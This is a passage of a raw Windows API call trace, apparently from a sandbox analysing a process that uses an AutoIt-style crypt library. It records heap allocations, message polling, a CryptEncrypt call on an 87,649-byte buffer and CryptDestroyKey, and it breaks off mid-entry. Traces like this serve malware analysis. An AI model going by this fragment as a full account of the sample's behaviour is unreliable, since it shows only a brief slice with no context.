0x13 [0166.863] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0166.863] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0166.863] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0166.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0166.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0166.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0166.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0166.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0166.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.864] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0166.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0166.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0166.867] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.867] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1565f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x15660) returned 1 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0166.867] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0166.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0166.868] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.868] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0166.868] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.868] CharLowerBuffW (in: lpsz="byte[87649]", cchLength=0xb | out: lpsz="byte[87649]") returned 0xb [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0166.868] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0166.869] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0166.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0166.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0166.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.870] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.870] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0166.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0166.870] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0166.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0166.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0166.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0166.870] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5d670*, pdwDataLen=0x87e820*=0x1565f, dwBufLen=0x15660 | out: pbData=0xa5d670*, pdwDataLen=0x87e820*=0x15660) returned 1 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0166.871] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0166.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0166.871] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.871] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0166.872] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0166.872] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0166.872] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0166.872] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0166.872] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0166.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.872] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0166.873] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.873] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0166.873] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0166.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0166.873] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0166.873] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.873] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0166.873] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0166.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0166.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0166.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0166.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0166.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.884] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0166.884] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.884] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0166.884] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0166.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0166.884] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.885] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0166.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0166.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0166.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0166.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0166.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0166.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0166.885] CryptDestroyKey (hKey=0x90aed8) returned 1 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0166.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0166.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0166.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0166.888] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0166.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0166.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0166.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0166.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0166.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0166.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0166.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0166.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0166.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0166.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0166.889] HeapFree (in: 